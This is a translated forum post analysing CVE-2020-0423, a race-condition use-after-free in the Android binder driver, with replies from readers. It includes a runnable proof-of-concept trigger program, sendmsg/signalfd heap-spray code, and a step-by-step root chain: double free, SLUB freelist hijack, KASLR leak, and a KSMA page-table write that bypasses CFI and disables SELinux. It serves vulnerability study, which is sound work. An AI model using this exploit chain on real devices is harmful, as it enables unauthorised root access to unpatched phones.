[Translation] CVE-2020-0423 Android kernel privilege escalation vulnerability analysis
Published 2020-12-25 14:44 · 21289 views
The bulletin for this vulnerability was published in October 2020; it is a recent privilege escalation bug in the binder driver.
In outline: a race condition between binder's sender and receiver over the binder_node structure is turned into a use-after-free. The author then escalates it to a double free and, with a clever sequence of heap sprays, leverages the SLUB allocator and the KSMA technique to bypass KASLR and CFI. Google lists the affected versions as Android 8 through 11. For the detailed original write-up (in English), see https://blog.longterm.io/cve-2020-0423.html

The PoC's trigger sequence is:
Thread 1: enter binder_release_work from binder_thread_release
Thread 2: binder_update_ref_for_handle() -> binder_dec_node_ilocked()
Thread 2: dec nodeA --> 0 (will free node)
Thread 1: ACQ inner_proc_lock
Thread 2: block on inner_proc_lock
Thread 1: dequeue work (BINDER_WORK_NODE, part of nodeA)
Thread 1: REL inner_proc_lock
Thread 2: ACQ inner_proc_lock
Thread 2: todo list cleanup, but work was already dequeued
Thread 2: free node
Thread 2: REL inner_proc_lock
Thread 1: deref w->type (UAF)
Breaking it down per thread:
Thread 1: enter binder_release_work from binder_thread_release
Thread 1: ACQ inner_proc_lock - acquires the lock
Thread 1: dequeue work (BINDER_WORK_NODE, part of nodeA) - removes the binder_work from the list
Thread 1: REL inner_proc_lock - releases the lock
Thread 1: deref w->type (UAF) - dereferences binder_work->type

Now look at Thread 2:
Thread 2: binder_update_ref_for_handle() -> binder_dec_node_ilocked()
Thread 2: dec nodeA --> 0 (will free node)
Thread 2: block on inner_proc_lock - waits for Thread 1 to release the lock
Thread 2: ACQ inner_proc_lock - acquires the lock
Thread 2: todo list cleanup, but work was already dequeued - empties the list
Thread 2: free node - frees the binder_node
Thread 2: REL inner_proc_lock - releases the lock

We can see that right after Thread 1 obtains the binder_work, the other thread frees it, yet Thread 1 keeps using it directly afterwards, causing the use-after-free.
And the binder_work is an embedded member of the binder_node.

Comparing the code before and after the patch, the main change is enlarging the scope of the binder_inner_proc_lock(proc) critical section. So this vulnerability can be blamed on not thinking through the required lock scope during development.
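The patched pattern can be illustrated with a minimal user-space sketch (work_item, todo, push_work and release_work are illustrative names, not the kernel's): the type field is snapshotted while the lock is held, so later code never dereferences an item that another thread may have freed.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

/* Minimal user-space model of the patched binder_release_work loop:
 * dequeue AND read the type under the lock; only use the snapshot after. */
struct work_item {
    int type;
    struct work_item *next;
};

static pthread_mutex_t proc_lock = PTHREAD_MUTEX_INITIALIZER;
static struct work_item *todo;

static void push_work(struct work_item *w) {
    pthread_mutex_lock(&proc_lock);
    w->next = todo;
    todo = w;
    pthread_mutex_unlock(&proc_lock);
}

/* Drains the list, recording up to `max` types; returns the item count.
 * `wtype` is read inside the critical section, mirroring the patch's
 * `wtype = w ? w->type : 0;`. */
static int release_work(int *types_out, int max) {
    int n = 0;
    for (;;) {
        pthread_mutex_lock(&proc_lock);
        struct work_item *w = todo;
        if (w)
            todo = w->next;
        int wtype = w ? w->type : 0;   /* snapshot under the lock */
        pthread_mutex_unlock(&proc_lock);
        if (!w)
            return n;
        if (n < max)
            types_out[n] = wtype;      /* safe even if w is freed by now */
        n++;
    }
}
```

In the pre-patch code, the w->type read sits after the unlock, and that window is exactly what the PoC races.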

The PoC triggers in three stages:

So the PoC is:

The author tested on a Pixel 4 running the Android 10 factory image QQ3A.200805.001, released in August 2020.

Let's walk through the PoC to see why it is written this way:

At this point, binder_ioctl calls binder_thread_release -> binder_release_work(proc, &thread->todo), which reaches the following code.

[Code excerpt 4]

When the payload sent by the sender thread contains a BINDER_TYPE_BINDER or BINDER_TYPE_WEAK_BINDER object, a binder_node structure is created, and the receiving end holds a reference to it (when that reference drops to 0, the binder_node is freed).
binder_translate_binder is then called, eventually reaching the code below; note that node->work is enqueued onto the thread->todo list.

[Code excerpt 3]

When binder receives the BC_FREE_BUFFER command, it calls the binder_free_node function.

[Code excerpt 2]

Note that you may not even need to issue BC_FREE_BUFFER explicitly: when a binder service finishes a transaction, it automatically sends BC_FREE_BUFFER, releasing the sender's binder_node structure. One can also look for a service like ITokenManager to act as an intermediary. The point is that sometimes you cannot control the service end; take a service like media, a system service you simply cannot control. ITokenManager, however, lets us control both the service end and the client end. (If the 水滴 (Waterdrop) exploit had used this approach, it might have been more efficient.)
So the binder_node is in fact released by the BC_FREE_BUFFER command, and some service receivers send it automatically.
In binder_parse, when replying to a transaction, servicemanager either calls binder_free_buffer (for a one-way transaction) or calls binder_send_reply.

In both cases, servicemanager ends up replying with BC_FREE_BUFFER; the kernel call flow is:

With the PoC understood, running it produces a kernel crash.

The PoC is not hard to understand, but I find the exploit quite clever. Since this is a UAF, a heap spray is needed. binder_node lives in the 128-byte cache, and the exploit combines sendmsg and signalfd for a stable spray. sendmsg alone frees its allocation as soon as the call returns, but as the Google article puts it, "signalfd() reallocates the 128-byte heap chunk as an 8-byte allocation and leaves the rest of it uninitialized". signalfd reclaims the 128-byte chunk that sendmsg just released, so the sendmsg payload stays resident in the heap, and apart from the few fields signalfd actually uses, the sprayed contents are left untouched. The spray can be written as:
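A sketch of one spray round as described above (the payload here is a zeroed placeholder, not a working fake binder_node; a real exploit must lay out the bytes to match the target kernel's struct):

```c
#include <assert.h>
#include <signal.h>
#include <string.h>
#include <sys/signalfd.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* One spray round: sendmsg() copies the 128-byte control buffer into a
 * kmalloc-128 chunk and frees it when the call returns; signalfd() then
 * grabs a chunk from the same cache and leaves most of it untouched, so
 * the sendmsg payload lingers in the kernel heap. */
static int spray_once(const unsigned char payload[128]) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0)
        return -1;

    char cbuf[128];
    memcpy(cbuf, payload, sizeof(cbuf));

    char data = 'A';
    struct iovec iov = { .iov_base = &data, .iov_len = 1 };
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = cbuf, .msg_controllen = sizeof(cbuf),
    };
    /* The call may fail cmsg validation; the kernel has still allocated
     * and freed the 128-byte control-buffer copy by then. */
    sendmsg(sv[0], &msg, MSG_DONTWAIT);

    /* Reclaim a chunk from the same cache without rewriting the payload. */
    sigset_t mask;
    sigemptyset(&mask);
    int sfd = signalfd(-1, &mask, 0);

    close(sv[0]);
    close(sv[1]);
    return sfd; /* kept open so the signalfd allocation stays alive */
}
```

In practice many such rounds are run, and the returned fds are kept until the overlap is no longer needed.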

Once the spray lands, the freed binder_work holds content filled in from user space via sendmsg, and the kernel code path keeps executing: w is now our sprayed content, fully under our control, so we can steer execution into any branch.

To summarize: whichever branch is taken, the code above frees the object again, forming a double free (to reach the final kfree, the fields of the controlled binder_node must satisfy certain conditions). Different branches free at different offsets:
1. The BINDER_WORK_TRANSACTION branch will free X
2. BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_DEAD_BINDER_AND_CLEAR and BINDER_WORK_CLEAR_DEATH_NOTIFICATION will free X+8
Choosing 1 (BINDER_WORK_TRANSACTION) enters the binder_cleanup_transaction function.

The key point is that the double free makes two subsequently allocated objects overlap; this is the core of the exploit. And to root a recent phone, both KASLR and CFI must be bypassed.

The core idea: since the two re-allocated objects overlap, if one holds a function pointer and the other can trigger a read, the bypass follows.
The signalfd system call allocates from the 128-byte heap cache. Its main functionality is:

With that understanding, the code becomes easy to read.

KSMA, simply put, means writing one descriptor entry into the kernel page tables, after which user space can read and write kernel memory at will, even the code segment; getting root is then trivial.
To borrow a diagram:

[Figure 5]
I won't go into the details here; see the PDF referenced above if you want to understand it. In short, we want to write a descriptor to a kernel address. How do we pull that off?

This uses the kernel's SLUB heap allocator. SLUB keeps a pointer called freelist that points at the most recently freed object.
The first 8 bytes of that object point at the next freed object, and so on.
On kmalloc, the allocator takes the object freelist points to, and reads that object's first 8 bytes as the new freelist.
On kfree, SLUB writes the current freelist pointer into the first 8 bytes of the object being freed, then updates freelist to point at this newly freed object.
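These rules can be modeled in user space with a toy slab (a sketch: slab, toy_kfree and toy_kmalloc are made-up names, and real SLUB on many kernels additionally obfuscates this next-free pointer):

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model of one SLUB cache: each free object's first 8 bytes hold the
 * address of the next free object; `freelist` points at the most
 * recently freed one. */
#define OBJ_SZ 128

static unsigned char slab[4 * OBJ_SZ];
static void *freelist;   /* NULL: nothing freed yet */

static void toy_kfree(void *obj) {
    /* write the current freelist into the freed object's first 8 bytes,
     * then point the freelist at this object */
    memcpy(obj, &freelist, sizeof(void *));
    freelist = obj;
}

static void *toy_kmalloc(void) {
    void *obj = freelist;
    if (obj)  /* the object's first 8 bytes become the new freelist */
        memcpy(&freelist, obj, sizeof(void *));
    return obj;
}
```

Replaying the figures below with this model: freeing slab+0x180 then slab+0x100 leaves freelist = slab+0x100, whose first 8 bytes point at slab+0x180, and the next toy_kmalloc returns slab+0x100.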

[Figure 6]

In the figure above, after kfree(0x1180), freelist = 0x1180 and the first 8 bytes at 0x1180 are 0.
After kfree(0x1100), freelist = 0x1100 and the first 8 bytes at 0x1100 are 0x1180, and so on.

[Figure 7]
In the figure above, after kmalloc returns the object at 0x1000, freelist moves from 0x1000 to 0x1100.
On the next allocation, which returns 0x1100, the allocator reads the first 8 bytes at 0x1100, which hold 0x1180, so freelist moves from 0x1100 to 0x1180.

This yields a new exploitation approach:
1. When the double free occurs, two subsequent allocations overlap. Free the first one, then spray over it with signalfd and modify its first 8 bytes from user space; that rewrites the freed object's next-free pointer, so a few allocations later the freelist serves an address specified from user space. The precondition is that the freed object must still be live at the corresponding kernel virtual address.

If we modify the value at the freelist position of a freed object in the slab, an object gets allocated wherever we want:
[Figure 8]
After changing the first 8 bytes at 0x1100 to 0xDEADBEEF, when the allocator works its way to that chunk via kmalloc(0x80), freelist = 0xDEADBEEF, and the next allocation is served at 0xDEADBEEF.
[Figure 9]
So by modifying the next-free pointer stored in a freed object, we get the effect of writing an arbitrary value to an arbitrary address.
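The same idea as a self-contained user-space sketch (hijack_demo and fake_target are made-up names; the static fake_target buffer stands in for the attacker-chosen address such as 0xDEADBEEF):

```c
#include <assert.h>
#include <string.h>

/* Toy freelist (next-free pointer lives in a free object's first 8
 * bytes), used to show the hijack: corrupt that pointer, and two
 * allocations later the allocator hands out the attacker's address. */
static void *flist;

static void toy_free(void *obj) {
    memcpy(obj, &flist, sizeof(void *));
    flist = obj;
}

static void *toy_alloc(void) {
    void *obj = flist;
    if (obj)
        memcpy(&flist, obj, sizeof(void *));
    return obj;
}

static unsigned char objs[2][128];
static unsigned char fake_target[128]; /* stands in for 0xDEADBEEF */

static void *hijack_demo(void) {
    toy_free(objs[0]);
    toy_free(objs[1]);                    /* freelist: objs[1] -> objs[0] */
    void *fake = fake_target;
    memcpy(objs[1], &fake, sizeof(fake)); /* the "signalfd write" step */
    toy_alloc();                          /* returns objs[1]; freelist = fake_target */
    return toy_alloc();                   /* this allocation lands on fake_target */
}
```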

If we can ultimately achieve *(swapper_pg_dir + 0xB5F00) = 0x00e8000080000751, we can patch the kernel at will.
But signalfd has a limitation: in the 8 bytes it writes, bits 8 and 18 are always set, so a written value of ...b5xxx always comes out as ...b5xxx | 0x40100 = ...f5xxx.
To work around this, the author found the ipa_testbus_mem buffer in the kernel, 0x198000 bytes in size and zero-filled.
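The constraint can be stated as a pure function. Bits 8 and 18 are consistent with sigmask(SIGKILL) and sigmask(SIGSTOP) (signals 9 and 19, bit = sig-1), which signalfd always forces in the stored mask, so any pointer written through this primitive gets 0x40100 ORed in:

```c
#include <assert.h>
#include <stdint.h>

/* Model of the signalfd write constraint: whatever 8-byte value user
 * space supplies, bits 8 and 18 end up set in what the kernel stores. */
static uint64_t signalfd_written_value(uint64_t v) {
    return v | 0x40100;
}
```

This is why an address ending in b5xxx comes out as f5xxx, and why a large zero-filled trampoline such as ipa_testbus_mem helps: landing at ipa_testbus_mem | 0x40100 is harmless because the whole buffer is zero.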

2. Spray signalfd once, trigger the free, and through a write() call change the freelist to ipa_testbus_mem | 0x40100, so the next allocation is served at ipa_testbus_mem | 0x40100.
Then spray with eventfd(0, EFD_NONBLOCK) combined with sendmsg; the eventfd pins the sendmsg allocation so the heap contents are not released.
The eventfd_ctx structure thus lands at ipa_testbus_mem | 0x40100, and eventfd_ctx+0x20 (the count field) can be modified from user space via write().
We can then write the B5F00 address into the count field, i.e. to ipa_testbus_mem | 0x40100 + 0x20.
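The write primitive in step 2 relies on eventfd semantics: a write(2) of 8 bytes adds that value to the kernel-side counter, the count field. In user space the behavior can be observed directly (a sketch; in the exploit the eventfd_ctx overlaps attacker-chosen memory, turning this into a controlled 8-byte store):

```c
#include <assert.h>
#include <stdint.h>
#include <sys/eventfd.h>
#include <unistd.h>

/* write(2) on an eventfd adds the supplied 8-byte value to
 * eventfd_ctx->count; read(2) returns and resets the count. */
static uint64_t eventfd_count_roundtrip(uint64_t value) {
    int efd = eventfd(0, EFD_NONBLOCK);
    if (efd < 0)
        return (uint64_t)-1;
    uint64_t out = 0;
    if (write(efd, &value, sizeof(value)) == (ssize_t)sizeof(value))
        read(efd, &out, sizeof(out));
    close(efd);
    return out;
}
```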

3. Now free all the eventfds, and again use the freed signalfd object to set the freelist to ipa_testbus_mem | 0x40100 + 0x20. The next signalfd allocation is then served at the B5F00 address, and a write() call stores the final block descriptor 0x00e8000080000751 there, bypassing CFI.

With kernel patching in hand:
1. Turn off SELinux.
2. Patch the sys_capset function, replacing it with shellcode.
3. Copy init's credentials into the current process, completing the privilege escalation.

To recap: this exploit has to win the race condition once per important stage. Control w->type to get the double free (w is a sprayed object: spray once, trigger another free, and you have the double free). Then comes the exploitation stage: spray with sendmsg/signalfd and take a free branch; spray seq_operations and read through the overlapping signalfd to leak the address of seq_start, bypassing KASLR. Then trigger the bug again and, combined with KSMA, write a block descriptor into the page tables by corrupting the freelist pointer. Because of signalfd's write constraint, a global buffer (ipa_testbus_mem) serves as a trampoline; a sendmsg-plus-eventfd spray keeps the payload resident, and a final write() to the eventfd count field performs the descriptor write, bypassing CFI. The remaining root steps are routine.

The original article came out only a few days ago, and the above is my own understanding of it; discussion and corrections are welcome.

References
https://blog.longterm.io/cve-2020-0423.html

KSMA: Breaking Android kernel isolation and Rooting with ARM MMU features - ThomasKing
https://i.blackhat.com/briefings/asia/2018/asia-18-WANG-KSMA-Breaking-Android-kernel-isolation-and-Rooting-with-ARM-MMU-features.pdf

Mitigations are attack surface, too - Project Zero
https://googleprojectzero.blogspot.com/2020/02/mitigations-are-attack-surface-too.html

Exploiting CVE-2020-0041: Escaping the Chrome Sandbox - Blue Frost Security
Part 1: https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/
Part 2: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/

 
 
struct binder_node {
    int debug_id;
    spinlock_t lock;
    struct binder_work work; /* the embedded binder_work */
    union {
        struct rb_node rb_node;
        struct hlist_node dead_node;
    };
    // [...]
// Before the patch
 
static struct binder_work *binder_dequeue_work_head(
                    struct binder_proc *proc,
                    struct list_head *list)
{
    struct binder_work *w;
 
    binder_inner_proc_lock(proc);
    w = binder_dequeue_work_head_ilocked(list);
    binder_inner_proc_unlock(proc);
    return w;
}
 
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
 
    while (1) {
        w = binder_dequeue_work_head(proc, list);
        /*
         * From this point on, there is no lock on `proc` anymore
         * which means `w` could have been freed in another thread and
         * therefore be pointing to dangling memory.
         */
        if (!w)
            return;
 
        switch (w->type) { /* <--- Use-after-free occurs here */
 
// [...]
// After the patch
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
    enum binder_work_type wtype;
 
    while (1) {
        binder_inner_proc_lock(proc);
        /*
         * Since the lock on `proc` is held while calling
         * `binder_dequeue_work_head_ilocked` and reading the `type` field of
         * the resulting `binder_work` struct, we can be sure its value has not
         * been tampered with.
         */
        w = binder_dequeue_work_head_ilocked(list); /* the dequeue and the type read below now happen under the lock */
        wtype = w ? w->type : 0;
        binder_inner_proc_unlock(proc);
        if (!w)
            return;
 
        switch (wtype) { /* <--- Use-after-free not possible anymore */
 
// [...]
/*
 * Generates a binder transaction able to trigger the bug
 */
static inline void init_binder_transaction(int nb) {
    /*
     * Writes `nb` times a BINDER_TYPE_BINDER object in the object buffer
     * and updates the offsets in the offset buffer accordingly
     */
    for (int i = 0; i < nb; i++) {
        struct flat_binder_object *fbo =
            (struct flat_binder_object *)((void*)(MEM_ADDR + 0x400LL + i*sizeof(*fbo)));
        fbo->hdr.type = BINDER_TYPE_BINDER; /* this is what creates the binder_node */
        fbo->binder = i;
        fbo->cookie = i;
        uint64_t *offset = (uint64_t *)((void *)(MEM_ADDR + OFFSETS_START + 8LL*i));
        *offset = i * sizeof(*fbo);
    }
 
    /*
     * Binder transaction data referencing the offset and object buffers
     */
    struct binder_transaction_data btd2 = {
        .flags = TF_ONE_WAY, /* we don't need a reply */
        .data_size = 0x28 * nb,
        .offsets_size = 8 * nb,
        .data.ptr.buffer = MEM_ADDR  + 0x400,
        .data.ptr.offsets = MEM_ADDR + OFFSETS_START,
    };
 
    uint64_t txn_size = sizeof(uint32_t) + sizeof(btd2);
 
    /* Transaction command */
    *(uint32_t*)(MEM_ADDR + 0x200) = BC_TRANSACTION;
    memcpy((void*)(MEM_ADDR + 0x204), &btd2, sizeof(btd2));
 
    /* Binder write/read structure sent to binder */
    struct binder_write_read bwr = {
        .write_size = txn_size * (1), // 1 txn
        .write_buffer = MEM_ADDR + 0x200
    };
    memcpy((void*)(MEM_ADDR + 0x100), &bwr, sizeof(bwr));
}
void *trigger_thread_func(void *argp) {
    unsigned long id = (unsigned long)argp;
    int ret = 0;
    int binder_fd = -1;
    int binder_fd_copy = -1;
 
    // Opening binder device
    binder_fd = open("/dev/binder", O_RDWR);
    if (binder_fd < 0)
        perror("An error occurred while opening binder");
 
    for (;;) {
        // Refill the memory region with the transaction
        init_binder_transaction(1);
        // Copying the binder fd
        binder_fd_copy = dup(binder_fd);
        // Sending the transaction
        ret = ioctl(binder_fd_copy, BINDER_WRITE_READ, MEM_ADDR + 0x100); /* creates the binder_node */
        if (ret != 0)
            debug_printf("BINDER_WRITE_READ did not work: %d", ret);
        // Binder thread exit
        ret = ioctl(binder_fd_copy, BINDER_THREAD_EXIT, 0); /* dequeues from thread->todo; by the time this returns, the binder_node is freed too */
        if (ret != 0)
            debug_printf("BINDER_WRITE_EXIT did not work: %d", ret);
        // Closing binder device
        close(binder_fd_copy);
    }
 
    return NULL;
}
int main() {
    pthread_t trigger_threads[NB_TRIGGER_THREADS];
 
    // Memory region for binder transactions
    mmap((void*)MEM_ADDR, MEM_SIZE, PROT_READ | PROT_WRITE,
         MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
 
    // Init random
    srand(time(0));
 
    // Get rid of stdout/stderr buffering
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
 
    // Starting trigger threads
    debug_print("Starting trigger threads");
    for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++) {
        pthread_create(&trigger_threads[i], NULL, trigger_thread_func, (void*)i); /* many threads, to win the race */
    }
    // Waiting for trigger threads
    for (int i = 0; i < NB_TRIGGER_THREADS; i++)
        pthread_join(trigger_threads[i], NULL);
 
    return 0;
}
// Userland code from the exploit
int binder_fd = open("/dev/binder", O_RDWR);
ioctl(binder_fd, BINDER_THREAD_EXIT, 0)
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    // [...]
 
    case BINDER_THREAD_EXIT:
        binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
                    proc->pid, thread->pid);
        binder_thread_release(proc, thread);
        thread = NULL;
        break;
 
    // [...]
static int binder_thread_release(struct binder_proc *proc,
                 struct binder_thread *thread)
{
    // [...]
 
    binder_release_work(proc, &thread->todo);
    binder_thread_dec_tmpref(thread);
    return active_transactions;
}
 
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
 
    while (1) {
        w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */
        if (!w)
            return;
 
    // [...]
static int binder_translate_binder(struct flat_binder_object *fp,
                   struct binder_transaction *t,
                   struct binder_thread *thread)
{
    // [...]
    ret = binder_inc_ref_for_node(target_proc, node,
            fp->hdr.type == BINDER_TYPE_BINDER,
            &thread->todo, &rdata);
    // [...]
}
static int binder_inc_ref_for_node(struct binder_proc *proc,
            struct binder_node *node,
            bool strong,
            struct list_head *target_list,
            struct binder_ref_data *rdata)
{
    // [...]
    ret = binder_inc_ref_olocked(ref, strong, target_list);
    // [...]
}
static int binder_inc_node_nilocked(struct binder_node *node, int strong,
                    int internal,
                    struct list_head *target_list)
{
    // [...]
    if (strong) {
        // [...]
        if (!node->has_strong_ref && target_list) {
            // [...]
            binder_enqueue_deferred_thread_work_ilocked(thread,
                                   &node->work); /* when the reference to this node is strong */
        }
    } else {
        // [...]
        if (!node->has_weak_ref && list_empty(&node->work.entry)) {
            // [...]
            binder_enqueue_work_ilocked(&node->work, target_list); /* when the reference is weak */
        }
    }
    return 0;
}
static void binder_free_node(struct binder_node *node)
{
    kfree(node);
    binder_stats_deleted(BINDER_STAT_NODE);
}
 
int binder_parse(struct binder_state *bs, struct binder_io *bio,
                 uintptr_t ptr, size_t size, binder_handler func)
{
        // [...]
        switch(cmd) {
        // [...]
        case BR_TRANSACTION_SEC_CTX:
        case BR_TRANSACTION: {
            // [...]
            if (func) {
                // [...]
                if (txn.transaction_data.flags & TF_ONE_WAY) {
                    binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);
                } else {
                    binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);
                }
            }
            break;
        }
        // [...]
static int binder_thread_write(struct binder_proc *proc,
            struct binder_thread *thread,
            binder_uintptr_t binder_buffer, size_t size,
            binder_size_t *consumed)
{
        // [...]
        case BC_FREE_BUFFER: {
            // [...]
            binder_transaction_buffer_release(proc, buffer, 0, false);
            // [...]
        }
        // [...]
static void binder_transaction_buffer_release(struct binder_proc *proc,
                          struct binder_buffer *buffer,
                          binder_size_t failed_at,
                          bool is_failure)
{
        // [...]
        switch (hdr->type) {
        // [...]
        case BINDER_TYPE_HANDLE:
        case BINDER_TYPE_WEAK_HANDLE: {
            struct flat_binder_object *fp;
            struct binder_ref_data rdata;
            int ret;
            fp = to_flat_binder_object(hdr);
            ret = binder_dec_ref_for_handle(proc, fp->handle,
                hdr->type == BINDER_TYPE_HANDLE, &rdata);
            // [...]
        } break;
        // [...]
 static int binder_update_ref_for_handle(struct binder_proc *proc,
        uint32_t desc, bool increment, bool strong,
        struct binder_ref_data *rdata)
{
    // [...]
    if (increment)
        ret = binder_inc_ref_olocked(ref, strong, NULL);
    else
        /*
         * Decrements the reference count by one and returns true since it
         * dropped to zero
         */
        delete_ref = binder_dec_ref_olocked(ref, strong);
    // [...]
    /* delete_ref is true, the binder node is freed */
    if (delete_ref)
        binder_free_ref(ref);
    return ret;
    // [...]
}
static void binder_free_ref(struct binder_ref *ref)
{
    if (ref->node)
        binder_free_node(ref->node);
    kfree(ref->death);
    kfree(ref);
}

Last edited by LowRebSwrd on 2022-10-03 00:33
Latest replies (16)
#2: Nice work, nice work. (2020-12-25 15:17)
#3: Thanks, now there's a way to root my Sony. (2020-12-25 19:50)
#4: Thanks for sharing. (2020-12-26 08:38)
#5: Thanks for sharing. (2020-12-26 10:51)
#6 (quoting #3, "Thanks, now there's a way to root my Sony"): Did it work? (2020-12-26 11:25)
#7: Impressive. (2020-12-26 18:19)
#8: Great stuff. (2020-12-27 10:02)
#9: Not bad, similar to a kernel privilege escalation I exploited before. (2020-12-27 18:38)
#10: Impressive, and so quick. (2021-1-4 14:06)
#11: Bump. (2021-1-4 17:11)
#12: https://www.longterm.io/cve-2020-0423.html is the original article. (2021-2-1 09:47)
#13: How is the spray_thread_data structure defined? Would appreciate an answer. (2021-2-7 09:54)
#14: The write-up reads a bit over-complicated; the principle is freeing one virtual memory address twice (in fact not the same physical address). The rest needs no elaboration. Using this principle, though, I can't seem to escalate privileges on my Android device; maybe my exploitation is off somewhere... I'm stuck on the written descriptor being invalid. (2021-2-15 15:42)
#16: A translation without saying so, and it still gets the Excellent flag??? (2021-11-26 14:36)
#17 (replying to starbuck, "A translation without saying so, and it still gets the Excellent flag???"): Look at the summary; it does say it is a translation. (2021-12-8 10:40)